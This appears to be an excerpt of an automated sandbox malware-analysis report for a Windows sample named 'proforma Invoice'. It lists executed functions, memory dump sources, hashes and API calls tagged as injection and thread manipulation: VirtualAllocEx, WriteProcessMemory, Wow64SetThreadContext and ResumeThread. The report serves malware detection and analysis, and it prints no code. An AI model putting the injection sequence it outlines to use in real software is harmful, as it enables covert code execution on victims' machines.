                                                                          control_flow_graph 1116 147590c-14759d9 CreateActCtxA 1118 14759e2-1475a3c 1116->1118 1119 14759db-14759e1 1116->1119 1126 1475a3e-1475a41 1118->1126 1127 1475a4b-1475a4f 1118->1127 1119->1118 1126->1127 1128 1475a51-1475a5d 1127->1128 1129 1475a60 1127->1129 1128->1129 1131 1475a61 1129->1131 1131->1131
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 014759C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1470000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: da857423e9479312223279c32815622dc44c65493ce632118047fb860471ad8a
                                                                          • Instruction ID: aef364e9040c8ccc969f4dcc926b8936126d122be121afbd71bdabceea74496a
                                                                          • Opcode Fuzzy Hash: da857423e9479312223279c32815622dc44c65493ce632118047fb860471ad8a
                                                                          • Instruction Fuzzy Hash: B441F3B0C00719CBDB24DFA9C884BDEBBB1BF49304F20846AD418AB265DB75594ACF90
                                                                          Function 014744B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 014759C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1470000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 18a7f2e4d899b46f69a8ad62285ee92cec2b766d9830db1600a457d7f2943ed2
                                                                          • Instruction ID: 9c37d199d0957559753ef049de24b847ea392f8c6bf329800974058818ebb611
                                                                          • Opcode Fuzzy Hash: 18a7f2e4d899b46f69a8ad62285ee92cec2b766d9830db1600a457d7f2943ed2
                                                                          • Instruction Fuzzy Hash: A041D2B0C00719CBDB24DFA9C844BDEBBB5BF49304F20846AD419AB365DB755946CF90
                                                                          Function 07D9BF20 Relevance: 1.6, APIs: 1, Instructions: 80threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 5e51f136a234bd6cde711958e9c041c55b6608e47ac082168cbda92229c72c04
                                                                          • Instruction ID: 11f41e79ae10e10c399a04a9f3b8de9ed23b7e569ada067e970369ff121c4d58
                                                                          • Opcode Fuzzy Hash: 5e51f136a234bd6cde711958e9c041c55b6608e47ac082168cbda92229c72c04
                                                                          • Instruction Fuzzy Hash: 02318CB1D002099FCB10DFAAD8457DEFBF4EB89320F20846AD519A7340DA79A944CFA5
                                                                          Function 01475A84 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1470000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 580355ba8d651cdbd801cdddc0ba938e00797ab03d10c4918fc0a764f1332b98
                                                                          • Instruction ID: fb20e2753d8e52cad017734630a8f4aca43d188cb546b77cb7f54106975f182b
                                                                          • Opcode Fuzzy Hash: 580355ba8d651cdbd801cdddc0ba938e00797ab03d10c4918fc0a764f1332b98
                                                                          • Instruction Fuzzy Hash: E121F372805349CEEB12DBB8C8553EEBFB0EF56310F14845BC449AF261D77A594ACB41
                                                                          Function 07D9C1C8 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D9C260
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 536c23f7e684b8047e33a5e3b4b8085ba06745e9305858ae8d967b0f6f890e9c
                                                                          • Instruction ID: 80d74dd85c5a85ad08bd8d99c5be71e4c67d26381a99cf17a5e1a017a9456df0
                                                                          • Opcode Fuzzy Hash: 536c23f7e684b8047e33a5e3b4b8085ba06745e9305858ae8d967b0f6f890e9c
                                                                          • Instruction Fuzzy Hash: 122128B29003599FCF10DFA9C985BEEBBF5FF49310F10842AE919A7240C7789944DBA4
                                                                          Function 07D9C1D0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D9C260
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: e206bfec6eb8a8d40eed23b0b189bafc61b0f1ff4b4cfdbfc7dbb4f448ef4d31
                                                                          • Instruction ID: 887e86f8156c6becbd55855cc321df0d6093b947385620779622d8a15d3ca604
                                                                          • Opcode Fuzzy Hash: e206bfec6eb8a8d40eed23b0b189bafc61b0f1ff4b4cfdbfc7dbb4f448ef4d31
                                                                          • Instruction Fuzzy Hash: 7E21F6B59003599FCF10DFAAC985BEEBBF5FF48310F10842AE919A7250C7789944DBA4
                                                                          Function 0147D708 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0147D797
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1470000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 73ee1da90dbf198ea043853881953b38160c99fef41a2b16a39c00b27ae5f424
                                                                          • Instruction ID: aed34fd94b8ba5e62f50b5860c8682790039cb626922d8abcb6f70faa9e167cc
                                                                          • Opcode Fuzzy Hash: 73ee1da90dbf198ea043853881953b38160c99fef41a2b16a39c00b27ae5f424
                                                                          • Instruction Fuzzy Hash: 6721D2B5D002499FDB10CFAAD584AEEFFF8EF48310F15845AE958A7210D378A951CFA1
                                                                          Function 07D9C030 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D9C0B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: 08ce5600cb7cbf67b6e62359eeba88039f9f85c4c892e7edbac5a19d25da59b0
                                                                          • Instruction ID: 62ecbb8b6970462074b1982e5237d6d7ac46e82b39f56feb8282e7fed7e7c8cb
                                                                          • Opcode Fuzzy Hash: 08ce5600cb7cbf67b6e62359eeba88039f9f85c4c892e7edbac5a19d25da59b0
                                                                          • Instruction Fuzzy Hash: A62125B1D002099FDB50DFAAC4857AEBBF5EF49324F54842AD519A7240CB789944CBA0
                                                                          Function 07D9C2C0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D9C340
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: f071efae26699da0df68774739ff580c8313d9b69638ea607dd354f384a3b701
                                                                          • Instruction ID: 6acff5f53d40638036181a61f352ec86815eea99ae28439f97a66e092fcd6f88
                                                                          • Opcode Fuzzy Hash: f071efae26699da0df68774739ff580c8313d9b69638ea607dd354f384a3b701
                                                                          • Instruction Fuzzy Hash: 3E2109B1D003599FCB10DFAAC845AEEFBF5FF48310F508429E519A7250C7799544CBA4
                                                                          Function 07D9C2B8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D9C340
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: d8986d1dc8342c7d2ac08d6677350f6d62244d96802787f7415887f358f26407
                                                                          • Instruction ID: 3cb32c92d9b37d741a5e77d78225e7e0c9163a1fcb4acbbec277047ba099b7b7
                                                                          • Opcode Fuzzy Hash: d8986d1dc8342c7d2ac08d6677350f6d62244d96802787f7415887f358f26407
                                                                          • Instruction Fuzzy Hash: 822128B1D002599FDB10DFAAC880AEEFBF5FF48310F50842AE519A7250C7389544CBA4
                                                                          Function 07D9C038 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D9C0B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: 882b6acc5b2a923a65b1c3dd273411a215fdcc012fde30fc766ade5db88850dd
                                                                          • Instruction ID: 2d5a886f29c38a1f8f00a01758f9169936852502b016cb2d3ccc492c897ff816
                                                                          • Opcode Fuzzy Hash: 882b6acc5b2a923a65b1c3dd273411a215fdcc012fde30fc766ade5db88850dd
                                                                          • Instruction Fuzzy Hash: 3D2115B1D002098FDB50DFAAC4857AEFBF5EF48324F54842AD519A7240CB78A944CFA1
                                                                          Function 0147D710 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0147D797
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1470000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 4dec15f917f56ff0b9663f835b240f2b54bdb76665cf53ee511d6d753f3a234d
                                                                          • Instruction ID: 09c123266f7d12b192e8263fc37e14a6c4e7cdbabe2f96b47601fe6af5c788c7
                                                                          • Opcode Fuzzy Hash: 4dec15f917f56ff0b9663f835b240f2b54bdb76665cf53ee511d6d753f3a234d
                                                                          • Instruction Fuzzy Hash: CA21B3B5D002489FDB10CF9AD584ADEFFF9EB48310F14841AE918A3350D378A944CFA5
                                                                          Function 07D9C108 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D9C17E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 50b33d78ecc231d1313485c64b9825cdc8768fcdcf8cd4130f929e89a2a1445e
                                                                          • Instruction ID: 0332fdae796b29241d9f8044b81cbc3d922ffb8a763272f5ac96b5839f924efc
                                                                          • Opcode Fuzzy Hash: 50b33d78ecc231d1313485c64b9825cdc8768fcdcf8cd4130f929e89a2a1445e
                                                                          • Instruction Fuzzy Hash: 9F1159B29002099FCB10DFAAC845AEEFFF5EF49320F108819E519A7250C779A540CBA4
                                                                          Function 07D9C110 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D9C17E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 1b08c8a9634e7131636b5ccec9e54a2ddb78e33b10eeef93177e1d952d1e9733
                                                                          • Instruction ID: c26f7b36753e366b35ce0d4c451662f75d0eb832ee68d43c6cbd53f758ac0e98
                                                                          • Opcode Fuzzy Hash: 1b08c8a9634e7131636b5ccec9e54a2ddb78e33b10eeef93177e1d952d1e9733
                                                                          • Instruction Fuzzy Hash: CA11F6B19002499FCB10DFAAC845AEEBFF5EF48320F148819E519A7250CB79A544CBA4
                                                                          Function 07D9BF80 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 5516dc48131852a84ff29748dc6ce15920d6cd300463ba2d73addbb51e1f81df
                                                                          • Instruction ID: b0810a358a0a7c5e358ca489f33053231ba73200447a54a52ed927a46af9c97f
                                                                          • Opcode Fuzzy Hash: 5516dc48131852a84ff29748dc6ce15920d6cd300463ba2d73addbb51e1f81df
                                                                          • Instruction Fuzzy Hash: 3E112BB1D002498BCB10DFAAC8457EEFBF5EF89324F248419D519A7240CB79A544CBA4
                                                                          Function 07D9BF88 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: f55c669cbbc44c40bcf8762df2391f27635c691f86773f89b2332226bbe34a06
                                                                          • Instruction ID: f987fe48f3fd50eaa95155977a47134ba3e50ddaa5c06b1d815f9c878b3867e3
                                                                          • Opcode Fuzzy Hash: f55c669cbbc44c40bcf8762df2391f27635c691f86773f89b2332226bbe34a06
                                                                          • Instruction Fuzzy Hash: 59110AB1D002498FDB20DFAAC4457AEFBF5EF88324F248419D519A7250CB79A544CFA4
                                                                          Function 0147B018 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0147B07E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1470000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: ae31a444725cf609d88b7909c4fa66bf0d357f12ad9ab3557dde4223f7e79aeb
                                                                          • Instruction ID: da606a5d547be3e02896ac17ce8adc676472268bc74327faf3f24e3fc87e52a6
                                                                          • Opcode Fuzzy Hash: ae31a444725cf609d88b7909c4fa66bf0d357f12ad9ab3557dde4223f7e79aeb
                                                                          • Instruction Fuzzy Hash: 9111DFB6C002498FDB20DF9AC444ADEFBF4EB88314F10841AD969A7210D379A545CFA1
                                                                          Function 07D9ADD0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07D9EB75
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          • Opcode ID: 83e0f5d2af010c92a65da798807270d96406e32f5ba67f5b44ba9c4d464056e9
                                                                          • Instruction ID: 2ca100675838299347cf68fab7995e643a6a9f2374dd2012cc74467e1b7ebdfb
                                                                          • Opcode Fuzzy Hash: 83e0f5d2af010c92a65da798807270d96406e32f5ba67f5b44ba9c4d464056e9
                                                                          • Instruction Fuzzy Hash: 7211E0B68002599FDB10DF9AC484BEEFFF8EB48324F108419E919A7710D379A944CFA1
                                                                          Function 07D9EB10 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07D9EB75
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          • Opcode ID: 5937acad7a0200fc9ec85de7cbdd5f0fa87c9bfeff2fae9dcc2eaeac32fa17ee
                                                                          • Instruction ID: d245dd90542028658b0e0fb93e4945560a31ed1b29cd15fc03b21bcf1e90e5d3
                                                                          • Opcode Fuzzy Hash: 5937acad7a0200fc9ec85de7cbdd5f0fa87c9bfeff2fae9dcc2eaeac32fa17ee
                                                                          • Instruction Fuzzy Hash: BE11F5B68002599FDB10DF99C885BDEFFF8EB49324F108419D919A7610C375A944CFA5
                                                                          Function 0109D4C4 Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051527999.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_109d000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a9c51c68abe14878ac0645035e476d7bb89295db0decddd857fc382a4aceef8a
                                                                          • Instruction ID: c5b9716704ee509c6845a04a1f6b3b37f04fcdc4b7657371efb9731e18ec639a
                                                                          • Opcode Fuzzy Hash: a9c51c68abe14878ac0645035e476d7bb89295db0decddd857fc382a4aceef8a
                                                                          • Instruction Fuzzy Hash: 8B216A71540200DFCF05DF58D9D0F2ABFA5FB88318F20C5A9E9490B256C336D406D7A1
                                                                          Function 010AD01C Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051565278.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10ad000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a2d19ab2d4a5217ed49da19abd2792fe7e6e955c64d0dbf5505ae514e189389a
                                                                          • Instruction ID: ecbb81084935657d20333f001e249eecddf49ff7ab2f7c6a72de70621b652ac0
                                                                          • Opcode Fuzzy Hash: a2d19ab2d4a5217ed49da19abd2792fe7e6e955c64d0dbf5505ae514e189389a
                                                                          • Instruction Fuzzy Hash: 4E212271684200DFCB15DFA8D980F26BFA5FB88354F60C5ADE98A4B656C33AD407CB61
                                                                          Function 010AD1D4 Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051565278.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10ad000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 908b9da3ec14122ae99c2b06fd6b07fb891351d56636ccb8f6d3f5bdf70d4ea3
                                                                          • Instruction ID: 1bb80e9297bf25fe66fb474991a29e35eeb6608e98be4c861f8ca6052053c94b
                                                                          • Opcode Fuzzy Hash: 908b9da3ec14122ae99c2b06fd6b07fb891351d56636ccb8f6d3f5bdf70d4ea3
                                                                          • Instruction Fuzzy Hash: 32210771504204EFDB05DFD8D5C0F2ABBA5FB94324F60C5ADD9894B656C33AD406CB61
                                                                          Function 010AD006 Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051565278.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10ad000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 862f1702802b1c78ca59f15d9a61cce81d11a44b8186675e5d40f3fa5de7590f
                                                                          • Instruction ID: 400cc396603d0699e34582b23b8d1c32fc73202846720b3619a53ace9360e19f
                                                                          • Opcode Fuzzy Hash: 862f1702802b1c78ca59f15d9a61cce81d11a44b8186675e5d40f3fa5de7590f
                                                                          • Instruction Fuzzy Hash: B12183755483809FCB03CF64D994B11BFB1EB46214F28C5DAD8898F6A7C33A9816CB62
                                                                          Function 0109D4BF Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051527999.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_109d000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                          • Instruction ID: 42c48482266092b74f45e4180b1023e32b380d65390c233c71c18363084413cb
                                                                          • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                          • Instruction Fuzzy Hash: F111DF76444280CFCF02CF54D5C4B16BFB1FB88314F24C6A9D9490B256C336D45ADBA2
                                                                          Function 010AD1CF Relevance: .1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051565278.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10ad000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                          • Instruction ID: 4b6e0ff82f3c803fbded00f159c8c73bae3ecce4f739931029f3b46b235afe92
                                                                          • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                          • Instruction Fuzzy Hash: FA11BB75504280DFDB02CF94C5C4B15BFA1FB84224F24C6A9D8894B6A6C33AD40ACB62
                                                                          Function 073405B3 Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066252033.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7340000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ca28d7ec24e27016bdbaa2692adbcbae2e84fc2cb786b288a12f054f01f548b8
                                                                          • Instruction ID: 4245815db58b5803cd8f9d26157732204d2f834567f877105af2db16bde66f6d
                                                                          • Opcode Fuzzy Hash: ca28d7ec24e27016bdbaa2692adbcbae2e84fc2cb786b288a12f054f01f548b8
                                                                          • Instruction Fuzzy Hash: 1A1145B19093C9DFD706DB74C811A89BFB19F03220F18C5EAC0A8CB6A3C739854ACB11
                                                                          Function 07340551 Relevance: .0, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066252033.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7340000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b22df61bf73b457b98c7b7fca0f1ea3e807f709f7df7686be0ca4cdb61dc91e6
                                                                          • Instruction ID: 4e63ce3ab885c11573c17aae3f7af31c22ee6b7b2621307c85cd35e74de9dc8b
                                                                          • Opcode Fuzzy Hash: b22df61bf73b457b98c7b7fca0f1ea3e807f709f7df7686be0ca4cdb61dc91e6
                                                                          • Instruction Fuzzy Hash: C3F05EF1E046169FE754DF6AC94A76BBAF4EF09210F2484A9954AE2701E77096048BA0
                                                                          Function 07340560 Relevance: .0, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066252033.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7340000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 42aeaf873dfa4f8757ccb735715d875fb52653b0a2b63d7ab251620d55cde2ea
                                                                          • Instruction ID: ca27ccbb3c29343a5b98ee288617184ab62aa107fc5b47c7e0fb152f9a0a76cf
                                                                          • Opcode Fuzzy Hash: 42aeaf873dfa4f8757ccb735715d875fb52653b0a2b63d7ab251620d55cde2ea
                                                                          • Instruction Fuzzy Hash: D5E030F0E0421A9FE754DF6E884576BBBF4EF48200F1048A9D549E6200E77096008BE1

                                                                          Non-executed Functions

                                                                          Function 07D9C458 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
